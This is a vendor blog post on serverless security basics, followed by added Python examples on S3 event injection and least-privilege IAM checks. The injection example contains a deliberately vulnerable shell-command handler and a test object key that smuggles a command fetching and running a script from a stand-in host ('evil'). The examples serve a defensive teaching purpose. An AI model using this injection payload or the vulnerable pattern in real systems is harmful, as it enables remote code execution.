A Firewall Admin's Introduction to Serverless Security

Nov 05, 2019

Ron Harnik, Senior Product Marketing Manager, Serverless Security

One of the most interesting things about working at Palo Alto Networks is getting to see pretty much every type of enterprise cybersecurity under the sun deployed in real-life situations. From Next-Generation Firewalls protecting network segments in data centers to WildFire preventing zero-day exploits, and from cloud security with Prisma Cloud to the cutting edge of endpoint protection with Cortex XDR, we encounter and learn from it all. Serverless computing is the latest in a long line of cloud technologies, and many organizations are still wrapping their heads around it. I want to share my view from the front line to help security teams who are taking their first steps in the serverless world. 

I come from a networking background, and I eventually made my way into the world of cloud and stayed there. It’s easy to live in the cloud bubble and forget about everything else, but the more I talk with customers and learn about their use-cases, the more I see just how versatile today’s enterprise security teams have to be. 

Serverless allows organizations to run applications without having to worry about infrastructure, networking, or operating systems. Everything below the application code itself is abstracted away. It’s the latest in a long line of cloud technologies that enable faster, more scalable and cheaper application development and deployment. Just as with any other technology, your organization wants to reap the benefits quickly and looks to you to make sure it’s safe to do so. So let’s take a high-level look at serverless and the key points you should consider when trying to secure it. 


My Company Wants to Use Serverless. Now What?

Just like any other advancement in software development technology, serverless comes with its own set of strengths and weaknesses that we have to consider. One key advantage is that with serverless, your security starting point is actually quite strong: the cloud provider owns patching and securing the hosts and the network your functions run on. What remains yours is the application code, its third-party dependencies, the permissions each function runs with, and the events it accepts as input.

In more detail, the term “serverless” generally refers to an operational model in which applications rely on managed services that abstract away the need to manage, patch and secure infrastructure and virtual machines. Serverless applications rely on a combination of managed cloud services and function-as-a-service (FaaS). FaaS products like AWS Lambda or Google Cloud Functions allow you to host pieces of code directly on the cloud provider and use a variety of events to trigger that code.

Since joining Palo Alto Networks through the acquisition of PureSec, the serverless security platform, I have had the chance to talk to security teams from large enterprises who are now expected to secure virtual machines, containers and serverless workloads, as well as internal corporate networks. They’re trying to figure out which steps they should take to address serverless security, and several questions come up frequently.


Are My Current Security Solutions Irrelevant?

Even when adoption happens rapidly, it doesn’t happen overnight. Especially at large enterprises, the environments that host your business applications are going to remain heterogeneous for a long while. This means that a layered approach to security is still the best course of action. 

If we apply the “Swiss Cheese Model” to cloud security, every technology, product or service we use is a slice of swiss cheese with holes (vulnerabilities) in it. Multiple security controls help us make sure those holes don’t align, preventing openings that allow attackers to be successful. 

The challenge of securing heterogeneous environments is that each type of workload (virtual machines, containers, serverless) is architected differently and requires a unique method of security to gain full coverage. For example, you might need to have a virtualized firewall protecting the perimeter of your cloud networks, a cloud workload protection platform defending each workload and a cloud security posture management solution for overall visibility and governance. 

Your current security solutions will likely remain relevant for some time, but you may need to combine them with new ones for more complete coverage. 


So, How Is Serverless Security Different?

With serverless, we have no control over the infrastructure or network our application runs on. This means that we can’t rely on server-based security or network filtering. It’s also important to acknowledge that serverless functions can be triggered by a large number of event sources, and each event source sends data in its own format. These events can include IoT triggers, API calls and notifications from other cloud services. An HTTP request can be routed through a firewall or WAF before it reaches the function, but an object written to an S3 bucket that triggers a Lambda function never crosses a network perimeter we control, so there is no inline filter to inspect it. 

Considering the new attack vectors serverless introduces, like event-injection attacks, in which untrusted data arrives inside the event payload itself (an object key, a message body, a record field) rather than over a request the network layer could have inspected, it becomes clear that serverless workloads require their own flavor of security. 
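The S3-to-Lambda case above, as an added example that is not code from the original post: a handler that builds a shell command from the object key in the notification, beside a hardened version that decodes the key the way S3 encodes it, validates it against an allowlist and hands an argv list to the caller so no shell is involved. The event shape follows the S3 notification format; the bucket name, the object keys and the `convert` command are constructed for illustration.

```python
"""Event injection in an S3-triggered function: vulnerable vs. hardened.

Added example, not code from the original post. The event shape follows
the S3 notification format; the bucket name, object keys and the
'convert' command are constructed for illustration.
"""
import re
from urllib.parse import unquote_plus


def make_s3_event(key: str) -> dict:
    """Constructed S3 ObjectCreated notification (only the fields read below)."""
    return {
        "Records": [
            {
                "eventSource": "aws:s3",
                "eventName": "ObjectCreated:Put",
                "s3": {
                    "bucket": {"name": "uploads-bucket"},
                    "object": {"key": key},
                },
            }
        ]
    }


def build_command_vulnerable(event: dict) -> str:
    """Interpolates the object key straight into a shell command line.

    Anyone who can write to the bucket chooses the key, so the key is
    attacker input that never crossed a firewall. Passing this string to
    subprocess.run(cmd, shell=True) runs whatever the key appends.
    """
    key = event["Records"][0]["s3"]["object"]["key"]
    return f"convert /tmp/{key} /tmp/out.png"


# Allowlist for object keys: a relative path of plain characters, no '..'.
SAFE_KEY = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_./-]{0,255}")


def validate_key(raw_key: str) -> str:
    """Decode the key the way S3 encodes it, then validate the decoded value."""
    key = unquote_plus(raw_key)  # S3 URL-encodes object keys in notifications
    if not SAFE_KEY.fullmatch(key) or ".." in key.split("/"):
        raise ValueError(f"rejected object key: {key!r}")
    return key


def build_command_hardened(event: dict) -> list:
    """Checks the event source, validates the key, and returns an argv list
    so the caller can use subprocess.run(argv) with no shell at all."""
    record = event["Records"][0]
    if record.get("eventSource") != "aws:s3":
        raise ValueError("unexpected event source")
    key = validate_key(record["s3"]["object"]["key"])
    return ["convert", f"/tmp/{key}", "/tmp/out.png"]


if __name__ == "__main__":
    hostile = make_s3_event("x.pdf; curl http://evil/x | sh")
    print("vulnerable:", build_command_vulnerable(hostile))
    try:
        build_command_hardened(hostile)
    except ValueError as err:
        print("hardened:", err)
    print("hardened:", build_command_hardened(make_s3_event("reports/q3.pdf")))
```

The order in `validate_key` matters: validating before decoding would let an encoded `..%2F` slip past the allowlist and become `../` afterwards, so decode first and validate the value you will actually use.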


Fundamentals of Serverless Security

With no networks or servers of your own to protect, serverless security becomes focused on ensuring code integrity, tight permissions and application behavior analysis. The main tenets of serverless security are:

  • Access and permissions: Maintain least-privileged access for serverless functions and other services. For example, if an AWS Lambda function needs to access a DynamoDB table, make sure it can only perform the specific action the business logic requires.
  • Vulnerability scanning: Ensure code and infrastructure-as-code template integrity by regularly scanning for vulnerable third-party dependencies, configuration errors and over-permissive roles.
  • Runtime protection: Use runtime protection to detect malicious event inputs and anomalous function behavior, and limit as necessary each function’s ability to access files, hosts, the internet and spawn child processes.
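The DynamoDB case under access and permissions, and the scan for over-permissive roles under vulnerability scanning, as one added example that is not code from the original post: two constructed execution-role policies for a function that only reads an Orders table, a simplified Allow-only policy evaluator (it ignores Deny, Condition, NotAction and NotResource, which real IAM evaluation honours), and a check that reports wildcard actions, actions the function does not use, and resources not scoped to the table. The table ARN, account ID and required-action set are assumptions.

```python
"""Least-privilege check for a Lambda execution role policy.

Added example, not code from the original post. The two policies, the
table ARN and the required-action set are constructed for illustration;
the evaluator is a deliberate simplification of IAM (Allow statements
only, no Deny, Condition, NotAction or NotResource).
"""
import fnmatch

ORDERS_TABLE = "arn:aws:dynamodb:us-east-1:123456789012:table/Orders"

# What the business logic actually calls: it reads orders, nothing else.
REQUIRED_ACTIONS = {"dynamodb:GetItem", "dynamodb:Query"}

# Constructed: the kind of policy a quick-start template hands out.
OVER_PERMISSIVE = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "dynamodb:*", "Resource": "*"},
    ],
}

# Constructed: the same function scoped to the actions and table it needs.
LEAST_PRIVILEGE = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["dynamodb:GetItem", "dynamodb:Query"],
            "Resource": ORDERS_TABLE,
        },
    ],
}


def _as_list(value):
    """IAM lets Action/Resource be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _matches(pattern: str, value: str) -> bool:
    """IAM-style '*' and '?' wildcard match (case-insensitive, a simplification)."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def is_allowed(policy: dict, action: str, resource: str) -> bool:
    """True if some Allow statement matches both the action and the resource."""
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        action_ok = any(_matches(p, action) for p in _as_list(stmt.get("Action", [])))
        resource_ok = any(_matches(p, resource) for p in _as_list(stmt.get("Resource", [])))
        if action_ok and resource_ok:
            return True
    return False


def find_overpermissive(policy: dict, required: set, scoped_resource: str) -> list:
    """Findings for Allow statements that grant more than the function requires."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append(f"statement {i}: grants by exclusion (NotAction/NotResource); review by hand")
        for act in _as_list(stmt.get("Action", [])):
            if "*" in act or "?" in act:
                findings.append(f"statement {i}: wildcard action {act!r}")
            elif act not in required:
                findings.append(f"statement {i}: action {act!r} is not used by the function")
        for res in _as_list(stmt.get("Resource", [])):
            if res != scoped_resource:
                findings.append(f"statement {i}: resource {res!r} is not scoped to {scoped_resource}")
    return findings


if __name__ == "__main__":
    for name, policy in (("over-permissive", OVER_PERMISSIVE), ("least-privilege", LEAST_PRIVILEGE)):
        print(name, "- DeleteTable on Orders allowed:",
              is_allowed(policy, "dynamodb:DeleteTable", ORDERS_TABLE))
        for finding in find_overpermissive(policy, REQUIRED_ACTIONS, ORDERS_TABLE):
            print("  ", finding)
```

Running the script shows the practical difference: with `dynamodb:*` on `*`, a compromised function can drop the table or read every other table in the account; with the scoped policy it can only read the one table it was written for, and the scan returns no findings. A check like this belongs in the same pipeline that scans the function's dependencies and infrastructure-as-code templates, so an over-permissive role is caught before deployment rather than after.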

